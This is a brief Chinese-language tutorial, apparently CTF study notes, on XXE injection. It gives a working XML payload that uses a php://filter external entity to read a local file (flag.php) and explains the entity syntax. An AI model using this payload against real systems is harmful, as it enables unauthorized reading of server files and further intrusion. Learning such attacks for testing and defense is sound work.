一、简述
XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载(上面说了实体加载有两种方式),导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。
二、漏洞paylaod应用
抓包请求头中有可能存在该漏洞
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
主要用于读取本地文件
<?xml version="1.0"?>
<!DOCTYPE user [
<!ENTITY payload SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/flag.php">
]>
<user>
<username>&payload;</username><password>mo</password>
</user>
在外部的形式
<!ENTITY 实体名称 SYSTEM "url">
说明:DOCTYPE为指定元素的根元素
ENTITY之后的实体名称url在后面的&中回显
文件url常用php伪协议读取表示